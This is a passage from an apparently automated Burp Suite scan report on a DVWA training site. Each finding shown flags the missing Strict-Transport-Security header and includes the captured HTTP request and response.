A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e00e28236ae59386587b3d8a65c24511
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 82847
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
9.30. https://pentest-ground.com:4280/robots.txt
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/robots.txt |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /robots.txt HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:16 GMT
Content-Type: text/plain
Content-Length: 25
Connection: close
Last-Modified: Tue, 21 Nov 2023 11:18:49 GMT
ETag: "19-60aa7c44ae30b"
Accept-Ranges: bytes
User-agent: *
Disallow: /
9.31. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=20f82cc3bfe2f59fa9f8dc5eaf0d9132
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=7878af9d1f476a29debc53d941ab743b
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
9.32. https://pentest-ground.com:4280/setup.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/setup.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /setup.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3e13af75256398bc637d5d0dd777847d
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/setup.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 79
create_db=Create+%2F+Reset+Database&user_token=ea82f69bc052fad0104ed7120d273e2e
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /setup.php
9.33. https://pentest-ground.com:4280/vulnerabilities/brute/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=677b9b581720fa14a254ac46290cf902
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
9.34. https://pentest-ground.com:4280/vulnerabilities/captcha/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6673dce764fbffe20cb502b85dd01724
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
9.35. https://pentest-ground.com:4280/vulnerabilities/csp/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
9.36. https://pentest-ground.com:4280/vulnerabilities/csp/WvEMlU
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/WvEMlU |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/csp/WvEMlU HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 280
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apach
...[SNIP]...
9.37. https://pentest-ground.com:4280/vulnerabilities/csrf/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/csrf/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=4af5ee61eab28a6dbbe1ce917fe25f23
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5359
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
9.38. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=70f6e6956d00d19077d4d7074dd5552e
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
9.39. https://pentest-ground.com:4280/vulnerabilities/exec/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d0ba91771b783950c31dcfd0b174fbb8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
9.40. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
9.41. https://pentest-ground.com:4280/vulnerabilities/javascript/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=047d8dd2ace9aaf1d3f54dd1c349de44
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:37:36 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
9.42. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/ |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/open_redirect/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f95de080a06d37780795c31df4383fd6
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:35:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
9.43. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
Previous
Next
Summary
|
Severity: |
Medium |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/info.php |
Note: This issue was generated by the Burp extension: Additional Scanner Checks.
Issue detail
There was no "Strict-Transport-Security" header in the server response.
Remediation detail
A Strict-Transport-Security HTTP header should be sent with each HTTPS response. The syntax is as follows:
Strict-Transport-Security: max-age=<seconds>[; includeSubDomains]
The parameter max-age gives the time frame for requirement of HTTPS in seconds and should be chosen quite high, e.g. several months. A value below 7776000 is considered as too low by this scanner check. The flag includeSubDomains defines that the policy applies also for sub domains of the sender of the response.
Request 1
GET /vulnerabilities/open_redirect/source/info.php?id=2 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
